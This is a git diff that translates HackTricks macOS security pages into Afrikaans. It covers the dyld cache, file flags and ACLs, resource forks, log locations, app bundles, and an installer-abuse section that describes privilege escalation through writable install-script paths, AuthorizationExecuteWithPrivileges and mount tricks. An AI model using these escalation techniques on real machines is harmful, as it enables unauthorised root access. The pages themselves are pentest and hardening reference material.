bundel is `*.app`-lêers). {% content-ref url="macos-bundles.md" %} [macos-bundles.md](macos-bundles.md) {% endcontent-ref %} -## Dyld Shared Cache +## Dyld Gedeelde Cache -On macOS (and iOS) all system shared libraries, like frameworks and dylibs, are **combined into a single file**, called the **dyld shared cache**. This improved performance, since code can be loaded faster. +Op macOS (en iOS) word alle stelsel gedeelde biblioteke, soos raamwerke en dylibs, **gekombineer in 'n enkele lêer**, genaamd die **dyld gedeelde cache**. Dit verbeter die prestasie, aangesien kode vinniger gelaai kan word. -Similar to the dyld shared cache, the kernel and the kernel extensions are also compiled into a kernel cache, which is loaded at boot time. +Soortgelyk aan die dyld gedeelde cache, word die kernel en die kernel-uitbreidings ook saamgestel in 'n kernel-cache wat by die opstarttyd gelaai word. -In order to extract the libraries from the single file dylib shared cache it was possible to use the binary [dyld\_shared\_cache\_util](https://www.mbsplugins.de/files/dyld\_shared\_cache\_util-dyld-733.8.zip) which might not be working nowadays but you can also use [**dyldextractor**](https://github.com/arandomdev/dyldextractor): +Om die biblioteke uit die enkele lêer dylib gedeelde cache te onttrek, was dit moontlik om die binêre [dyld\_shared\_cache\_util](https://www.mbsplugins.de/files/dyld\_shared\_cache\_util-dyld-733.8.zip) te gebruik wat dalk nie meer werk nie, maar jy kan ook [**dyldextractor**](https://github.com/arandomdev/dyldextractor) gebruik: {% code overflow="wrap" %} ```bash @@ -104,63 +104,56 @@ dyldex_all [dyld_shared_cache_path] # Extract all ``` {% endcode %} -In older versions you might be able to find the **shared cache** in **`/System/Library/dyld/`**. +In ouer weergawes kan jy die **gedeelde cache** in **`/System/Library/dyld/`** vind. -In iOS you can find them in **`/System/Library/Caches/com.apple.dyld/`**. +In iOS kan jy hulle vind in **`/System/Library/Caches/com.apple.dyld/`**. {% hint style="success" %} -Note that even if `dyld_shared_cache_util` tool doesn't work, you can pass the **shared dyld binary to Hopper** and Hopper will be able to identify all the libraries and let you **select which one** you want to investigate: +Let daarop dat selfs as die `dyld_shared_cache_util`-instrument nie werk nie, kan jy die **gedeelde dyld-binêre aan Hopper oorhandig** en Hopper sal in staat wees om al die biblioteke te identifiseer en jou **laat kies watter een** jy wil ondersoek: {% endhint %}
-## Special File Permissions +## Spesiale Lêerregte -### Folder permissions +### Vouerregte -In a **folder**, **read** allows to **list it**, **write** allows to **delete** and **write** files on it, and **execute** allows to **traverse** the directory. So, for example, a user with **read permission over a file** inside a directory where he **doesn't have execute** permission **won't be able to read** the file. +In 'n **vouer** laat **lees** toe om dit te **lys**, **skryf** laat toe om lêers daarop te **verwyder** en **skryf** en **uitvoer** laat toe om deur die gids te **beweeg**. So, byvoorbeeld, 'n gebruiker met **leestoestemming oor 'n lêer** binne 'n gids waar hy **nie uitvoer** toestemming het **nie sal nie in staat wees om** die lêer te lees nie. -### Flag modifiers +### Vlagwysigers -There are some flags that could be set in the files that will make file behave differently. You can **check the flags** of the files inside a directory with `ls -lO /path/directory` +Daar is sekere vlae wat in die lêers ingestel kan word wat die gedrag van die lêer anders maak. Jy kan die vlae van die lêers binne 'n gids **nagaan met `ls -lO /pad/gids`** -* **`uchg`**: Known as **uchange** flag will **prevent any action** changing or deleting the **file**. To set it do: `chflags uchg file.txt` - * The root user could **remove the flag** and modify the file -* **`restricted`**: This flag makes the file be **protected by SIP** (you cannot add this flag to a file). -* **`Sticky bit`**: If a directory with sticky bit, **only** the **directories owner or root can remane or delete** files. Typically this is set on the /tmp directory to prevent ordinary users from deleting or moving other users’ files. +* **`uchg`**: Bekend as die **uchange**-vlag sal enige aksie wat die **lêer verander of verwyder** voorkom. Om dit in te stel, doen: `chflags uchg lêer.txt` +* Die root-gebruiker kan die vlag **verwyder** en die lêer wysig +* **`restricted`**: Hierdie vlag maak die lêer **beskerm deur SIP** (jy kan hierdie vlag nie by 'n lêer voeg nie). +* **`Sticky bit`**: As 'n gids 'n plakkerige bit het, kan **slegs** die **gidseienaar of root lêers hernoem of verwyder**. Tipies word dit op die /tmp-gids ingestel om te voorkom dat gewone gebruikers ander gebruikers se lêers verwyder of skuif. -### **File ACLs** +### **Lêer ACL's** -File **ACLs** contain **ACE** (Access Control Entries) where more **granular permissions** can be assigned to different users. +Lêer **ACL's** bevat **ACE's** (Access Control Entries) waar meer **fynkorrelige regte** aan verskillende gebruikers toegewys kan word. -It's possible to grant a **directory** these permissions: `list`, `search`, `add_file`, `add_subdirectory`, `delete_child`, `delete_child`.\ -Ans to a **file**: `read`, `write`, `append`, `execute`. - -When the file contains ACLs you will **find a "+" when listing the permissions like in**: +Dit is moontlik om hierdie regte aan 'n **gids** toe te ken: `lys`, `soek`, `voeg_lêer_by`, `voeg_subgids_by`, `verwyder_kind`, `verwyder_kind`.\ +En aan 'n **lêer**: `lees`, `skryf`, `aanheg`, `uitvoer`. +Wanneer die lêer ACL's bevat, sal jy 'n "+" vind wanneer jy die regte lys, soos in: ```bash ls -ld Movies drwx------+ 7 username staff 224 15 Apr 19:42 Movies ``` - -You can **read the ACLs** of the file with: - +Jy kan die ACL's van die lêer lees met: ```bash ls -lde Movies drwx------+ 7 username staff 224 15 Apr 19:42 Movies - 0: group:everyone deny delete +0: group:everyone deny delete ``` - -You can find **all the files with ACLs** with (this is veeery slow): - +Jy kan **alle lêers met ACL's** vind met (dit is baie stadig): ```bash ls -RAle / 2>/dev/null | grep -E -B1 "\d: " ``` +### Bronvurke | macOS ADS -### Resource Forks | macOS ADS - -This is a way to obtain **Alternate Data Streams in MacOS** machines. You can save content inside an extended attribute called **com.apple.ResourceFork** inside a file by saving it in **file/..namedfork/rsrc**. - +Dit is 'n manier om **Alternatiewe Datastrome in MacOS**-masjiene te verkry. Jy kan inhoud binne 'n uitgebreide eienskap genaamd **com.apple.ResourceFork** in 'n lêer stoor deur dit in **file/..namedfork/rsrc** te stoor. ```bash echo "Hello" > a.txt echo "Hello Mac ADS" > a.txt/..namedfork/rsrc @@ -171,8 +164,7 @@ com.apple.ResourceFork: Hello Mac ADS ls -l a.txt #The file length is still q -rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt ``` - -You can **find all the files containing this extended attribute** with: +Jy kan **alle lêers wat hierdie uitgebreide eienskap bevat**, vind met: {% code overflow="wrap" %} ```bash @@ -180,50 +172,50 @@ find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf ``` {% endcode %} -## **Universal binaries &** Mach-o Format +## **Universele binaêre &** Mach-o-formaat -Mac OS binaries usually are compiled as **universal binaries**. A **universal binary** can **support multiple architectures in the same file**. +Mac OS-binaêre lêers word gewoonlik saamgestel as **universele binaêre lêers**. 'n **Universele binaêre lêer** kan **ondersteuning bied vir verskeie argitekture in dieselfde lêer**. {% content-ref url="universal-binaries-and-mach-o-format.md" %} [universal-binaries-and-mach-o-format.md](universal-binaries-and-mach-o-format.md) {% endcontent-ref %} -## macOS memory dumping +## macOS-geheue-afvoer {% content-ref url="macos-memory-dumping.md" %} [macos-memory-dumping.md](macos-memory-dumping.md) {% endcontent-ref %} -## Risk Category Files Mac OS +## Risikokategorie-lêers Mac OS -The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` is where information about the **risk associated with different file extensions is stored**. This directory categorizes files into various risk levels, influencing how Safari handles these files upon download. The categories are as follows: +Die gids `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` is waar inligting oor die **risiko wat verband hou met verskillende lêeruitbreidings** gestoor word. Hierdie gids kategoriseer lêers in verskillende risikovlakke, wat beïnvloed hoe Safari hierdie lêers hanteer wanneer dit afgelaai word. Die kategorieë is as volg: -- **LSRiskCategorySafe**: Files in this category are considered **completely safe**. Safari will automatically open these files after they are downloaded. -- **LSRiskCategoryNeutral**: These files come with no warnings and are **not automatically opened** by Safari. -- **LSRiskCategoryUnsafeExecutable**: Files under this category **trigger a warning** indicating that the file is an application. This serves as a security measure to alert the user. -- **LSRiskCategoryMayContainUnsafeExecutable**: This category is for files, such as archives, that might contain an executable. Safari will **trigger a warning** unless it can verify that all contents are safe or neutral. +- **LSRiskCategorySafe**: Lêers in hierdie kategorie word as **volkome veilig** beskou. Safari sal hierdie lêers outomaties oopmaak nadat hulle afgelaai is. +- **LSRiskCategoryNeutral**: Hierdie lêers kom sonder waarskuwings en word deur Safari **nie outomaties oopgemaak** nie. +- **LSRiskCategoryUnsafeExecutable**: Lêers onder hierdie kategorie **aktiveer 'n waarskuwing** wat aandui dat die lêer 'n toepassing is. Dit dien as 'n sekuriteitsmaatreël om die gebruiker te waarsku. +- **LSRiskCategoryMayContainUnsafeExecutable**: Hierdie kategorie is vir lêers, soos argiewe, wat 'n uitvoerbare lêer kan bevat. Safari sal 'n waarskuwing **aktiveer** tensy dit kan verifieer dat alle inhoud veilig of neutraal is. -## Log files +## Loglêers -* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: Contains information about downloaded files, like the URL from where they were downloaded. -* **`/var/log/system.log`**: Main log of OSX systems. com.apple.syslogd.plist is responsible for the execution of syslogging (you can check if it's disabled looking for "com.apple.syslogd" in `launchctl list`. -* **`/private/var/log/asl/*.asl`**: These are the Apple System Logs which may contain interesting information. -* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: Stores recently accessed files and applications through "Finder". -* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: Stores items to launch upon system startup -* **`$HOME/Library/Logs/DiskUtility.log`**: Log file for thee DiskUtility App (info about drives, including USBs) -* **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: Data about wireless access points. -* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: List of daemons deactivated. +* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: Bevat inligting oor afgelaai lêers, soos die URL waarvandaan hulle afgelaai is. +* **`/var/log/system.log`**: Hooflog van OSX-stelsels. com.apple.syslogd.plist is verantwoordelik vir die uitvoering van syslogging (jy kan nagaan of dit gedeaktiveer is deur te soek na "com.apple.syslogd" in `launchctl list`. +* **`/private/var/log/asl/*.asl`**: Dit is die Apple-stelsellogboeke wat interessante inligting kan bevat. +* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: Stoor onlangs benaderde lêers en toepassings deur "Finder". +* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: Stoor items om by stelselopstart te begin +* **`$HOME/Library/Logs/DiskUtility.log`**: Loglêer vir die DiskUtility-toepassing (inligting oor aandrywings, insluitend USB's) +* **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: Data oor draadlose toegangspunte. +* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: Lys van gedeaktiveerde daemons.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md index 74fc7e1e8..59705ecb4 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md @@ -1,74 +1,74 @@ -# macOS Bundles +# macOS Bundels
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Basic Information +## Basiese Inligting -Bundles in macOS serve as containers for a variety of resources including applications, libraries, and other necessary files, making them appear as single objects in Finder, such as the familiar `*.app` files. The most commonly encountered bundle is the `.app` bundle, though other types like `.framework`, `.systemextension`, and `.kext` are also prevalent. +Bundels in macOS dien as houers vir 'n verskeidenheid hulpbronne, insluitend toepassings, biblioteke en ander nodige lêers, wat dit laat voorkom as enkele voorwerpe in Finder, soos die bekende `*.app`-lêers. Die mees algemeen aangetroffe bundel is die `.app`-bundel, alhoewel ander tipes soos `.framework`, `.systemextension` en `.kext` ook algemeen voorkom. -### Essential Components of a Bundle +### Essensiële Komponente van 'n Bundel -Within a bundle, particularly within the `.app/Contents/` directory, a variety of important resources are housed: +Binne 'n bundel, veral binne die `.app/Contents/`-gids, word 'n verskeidenheid belangrike hulpbronne gehuisves: -- **_CodeSignature**: This directory stores code-signing details vital for verifying the integrity of the application. You can inspect the code-signing information using commands like: - %%%bash - openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 - %%% -- **MacOS**: Contains the executable binary of the application that runs upon user interaction. -- **Resources**: A repository for the application's user interface components including images, documents, and interface descriptions (nib/xib files). -- **Info.plist**: Acts as the application's main configuration file, crucial for the system to recognize and interact with the application appropriately. +- **_CodeSignature**: Hierdie gids stoor kode-ondertekendetails wat noodsaaklik is vir die verifikasie van die integriteit van die toepassing. Jy kan die kode-ondertekeningsinligting inspekteer deur opdragte soos die volgende te gebruik: +%%%bash +openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 +%%% +- **MacOS**: Bevat die uitvoerbare binêre lêer van die toepassing wat uitgevoer word wanneer die gebruiker interaksie het. +- **Resources**: 'n Bergplek vir die toepassing se gebruikerskoppelvlakkomponente, insluitend beelde, dokumente en koppelvlakbeskrywings (nib/xib-lêers). +- **Info.plist**: Tree op as die toepassing se hoofkonfigurasie-lêer, wat noodsaaklik is vir die stelsel om die toepassing behoorlik te herken en mee te interaksieer. -#### Important Keys in Info.plist +#### Belangrike Sleutels in Info.plist -The `Info.plist` file is a cornerstone for application configuration, containing keys such as: +Die `Info.plist`-lêer is 'n hoeksteen vir toepassingskonfigurasie en bevat sleutels soos: -- **CFBundleExecutable**: Specifies the name of the main executable file located in the `Contents/MacOS` directory. -- **CFBundleIdentifier**: Provides a global identifier for the application, used extensively by macOS for application management. -- **LSMinimumSystemVersion**: Indicates the minimum version of macOS required for the application to run. +- **CFBundleExecutable**: Spesifiseer die naam van die hoofuitvoerbare lêer wat in die `Contents/MacOS`-gids geleë is. +- **CFBundleIdentifier**: Verskaf 'n globale identifiseerder vir die toepassing, wat uitgebreid deur macOS gebruik word vir toepassingsbestuur. +- **LSMinimumSystemVersion**: Dui die minimum weergawe van macOS aan wat vereis word vir die uitvoering van die toepassing. -### Exploring Bundles +### Verkenning van Bundels -To explore the contents of a bundle, such as `Safari.app`, the following command can be used: +Om die inhoud van 'n bundel, soos `Safari.app`, te verken, kan die volgende opdrag gebruik word: %%%bash ls -lR /Applications/Safari.app/Contents %%% -This exploration reveals directories like `_CodeSignature`, `MacOS`, `Resources`, and files like `Info.plist`, each serving a unique purpose from securing the application to defining its user interface and operational parameters. +Hierdie verkenning onthul gidsname soos `_CodeSignature`, `MacOS`, `Resources`, en lêernaam soos `Info.plist`, wat elk 'n unieke doel dien, van die beveiliging van die toepassing tot die definisie van sy gebruikerskoppelvlak en operasionele parameters. -#### Additional Bundle Directories +#### Addisionele Bundelgidse -Beyond the common directories, bundles may also include: +Buiten die algemene gidse kan bundels ook die volgende insluit: -- **Frameworks**: Contains bundled frameworks used by the application. -- **PlugIns**: A directory for plug-ins and extensions that enhance the application's capabilities. -- **XPCServices**: Holds XPC services used by the application for out-of-process communication. +- **Frameworks**: Bevat gebundelde raamwerke wat deur die toepassing gebruik word. +- **PlugIns**: 'n Gids vir invoegtoepassings en uitbreidings wat die vermoëns van die toepassing verbeter. +- **XPCServices**: Hou XPC-diens wat deur die toepassing gebruik word vir buiteproseskommunikasie. -This structure ensures that all necessary components are encapsulated within the bundle, facilitating a modular and secure application environment. +Hierdie struktuur verseker dat alle nodige komponente binne die bundel gekapsuleer is, wat 'n modulêre en veilige toepassingsomgewing fasiliteer. -For more detailed information on `Info.plist` keys and their meanings, the Apple developer documentation provides extensive resources: [Apple Info.plist Key Reference](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html). +Vir meer gedetailleerde inligting oor `Info.plist`-sleutels en hul betekenisse, bied die Apple-ontwikkelaarsdokumentasie uitgebreide hulpbronne: [Apple Info.plist Sleutelverwys](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md index 113c1d4bf..12fc49bf9 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md @@ -1,37 +1,36 @@ -# macOS Installers Abuse +# macOS Installerse Misbruik
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Pkg Basic Information +## Pkg Basiese Inligting -A macOS **installer package** (also known as a `.pkg` file) is a file format used by macOS to **distribute software**. These files are like a **box that contains everything a piece of software** needs to install and run correctly. +'n macOS **installasiepakkie** (ook bekend as 'n `.pkg`-lêer) is 'n lêerformaat wat deur macOS gebruik word om sagteware te **versprei**. Hierdie lêers is soos 'n **boks wat alles bevat wat 'n stuk sagteware** nodig het om korrek te installeer en te loop. -The package file itself is an archive that holds a **hierarchy of files and directories that will be installed on the target** computer. It can also include **scripts** to perform tasks before and after the installation, like setting up configuration files or cleaning up old versions of the software. +Die pakkie-lêer self is 'n argief wat 'n **hiërargie van lêers en gide bevat wat op die teikenrekenaar geïnstalleer sal word**. Dit kan ook **skripte** insluit om take voor en na die installasie uit te voer, soos die opstel van konfigurasie-lêers of die skoonmaak van ou weergawes van die sagteware. -### Hierarchy +### Hiërargie
https://www.youtube.com/watch?v=iASSG0_zobQ
-* **Distribution (xml)**: Customizations (title, welcome text…) and script/installation checks -* **PackageInfo (xml)**: Info, install requirements, install location, paths to scripts to run -* **Bill of materials (bom)**: List of files to install, update or remove with file permissions -* **Payload (CPIO archive gzip compresses)**: Files to install in the `install-location` from PackageInfo -* **Scripts (CPIO archive gzip compressed)**: Pre and post install scripts and more resources extracted to a temp directory for execution. - -### Decompress +* **Distribution (xml)**: Aanpassings (titel, welkomstekst...) en skrips/installasiekontroles +* **PackageInfo (xml)**: Inligting, installasievereistes, installasieplek, paaie na skripte om uit te voer +* **Bill of materials (bom)**: Lys van lêers om te installeer, op te dateer of te verwyder met lêerregte +* **Payload (CPIO-argief gzip-gekomprimeer)**: Lêers om te installeer in die `install-location` van PackageInfo +* **Skripte (CPIO-argief gzip-gekomprimeer)**: Voor- en na-installasieskripte en meer hulpbronne wat onttrek word na 'n tydelike gids vir uitvoering. +### Ontkomprimeer ```bash # Tool to directly get the files inside a package pkgutil —expand "/path/to/package.pkg" "/path/to/out/dir" @@ -45,74 +44,71 @@ xar -xf "/path/to/package.pkg" cat Scripts | gzip -dc | cpio -i cpio -i < Scripts ``` +## DMG Basiese Inligting -## DMG Basic Information +DMG-lêers, of Apple Disk Images, is 'n lêerformaat wat deur Apple se macOS gebruik word vir skyfafbeeldings. 'n DMG-lêer is in wese 'n **monteerbare skyfafbeelding** (dit bevat sy eie lêersisteem) wat gewoonlik saamgedruk en soms versleutelde rou blokdata bevat. Wanneer jy 'n DMG-lêer oopmaak, monteer macOS dit asof dit 'n fisiese skyf is, sodat jy toegang tot sy inhoud kan verkry. -DMG files, or Apple Disk Images, are a file format used by Apple's macOS for disk images. A DMG file is essentially a **mountable disk image** (it contains its own filesystem) that contains raw block data typically compressed and sometimes encrypted. When you open a DMG file, macOS **mounts it as if it were a physical disk**, allowing you to access its contents. - -### Hierarchy +### Hiërargie
-The hierarchy of a DMG file can be different based on the content. However, for application DMGs, it usually follows this structure: +Die hiërargie van 'n DMG-lêer kan verskil afhangende van die inhoud. Vir toepassings-DMGs volg dit gewoonlik hierdie struktuur: -* Top Level: This is the root of the disk image. It often contains the application and possibly a link to the Applications folder. - * Application (.app): This is the actual application. In macOS, an application is typically a package that contains many individual files and folders that make up the application. - * Applications Link: This is a shortcut to the Applications folder in macOS. The purpose of this is to make it easy for you to install the application. You can drag the .app file to this shortcut to install the app. +* Topvlak: Dit is die wortel van die skyfafbeelding. Dit bevat dikwels die toepassing en moontlik 'n skakel na die Toepassings-vouer. +* Toepassing (.app): Dit is die werklike toepassing. In macOS is 'n toepassing tipies 'n pakkie wat baie individuele lêers en vouers bevat wat die toepassing uitmaak. +* Toepassingskakel: Dit is 'n skakel na die Toepassings-vouer in macOS. Die doel hiervan is om dit maklik te maak om die toepassing te installeer. Jy kan die .app-lêer na hierdie skakel sleep om die app te installeer. -## Privesc via pkg abuse +## Privesc via pkg-misbruik -### Execution from public directories +### Uitvoering vanaf openbare gids -If a pre or post installation script is for example executing from **`/var/tmp/Installerutil`**, and attacker could control that script so he escalate privileges whenever it's executed. Or another similar example: +As 'n voor- of na-installasieskrip byvoorbeeld uitgevoer word vanaf **`/var/tmp/Installerutil`**, kan 'n aanvaller daardie skrip beheer en voorregte verhoog wanneer dit uitgevoer word. Of 'n ander soortgelyke voorbeeld:
https://www.youtube.com/watch?v=iASSG0_zobQ
### AuthorizationExecuteWithPrivileges -This is a [public function](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) that several installers and updaters will call to **execute something as root**. This function accepts the **path** of the **file** to **execute** as parameter, however, if an attacker could **modify** this file, he will be able to **abuse** its execution with root to **escalate privileges**. - +Dit is 'n [openbare funksie](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) wat verskeie installeerders en opdateringsoproep om iets as root uit te voer. Hierdie funksie aanvaar die **pad** van die **lêer** wat as parameter **uitgevoer** moet word, maar as 'n aanvaller hierdie lêer kon **verander**, sal hy in staat wees om die uitvoering daarvan met root te **misbruik** om voorregte te verhoog. ```bash # Breakpoint in the function to check wich file is loaded (lldb) b AuthorizationExecuteWithPrivileges # You could also check FS events to find this missconfig ``` +Vir meer inligting, kyk na hierdie praatjie: [https://www.youtube.com/watch?v=lTOItyjTTkw](https://www.youtube.com/watch?v=lTOItyjTTkw) -For more info check this talk: [https://www.youtube.com/watch?v=lTOItyjTTkw](https://www.youtube.com/watch?v=lTOItyjTTkw) +### Uitvoering deur montering -### Execution by mounting +As 'n installeerder skryf na `/tmp/fixedname/bla/bla`, is dit moontlik om **'n montering te skep** oor `/tmp/fixedname` sonder eienaars sodat jy enige lêer tydens die installasie kan wysig om die installasieproses te misbruik. -If an installer writes to `/tmp/fixedname/bla/bla`, it's possible to **create a mount** over `/tmp/fixedname` with noowners so you could **modify any file during the installation** to abuse the installation process. +'n Voorbeeld hiervan is **CVE-2021-26089** wat daarin geslaag het om 'n periodieke skripsie te **oorwrite** om uitvoering as root te verkry. Vir meer inligting, kyk na die praatjie: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE) -An example of this is **CVE-2021-26089** which managed to **overwrite a periodic script** to get execution as root. For more information take a look to the 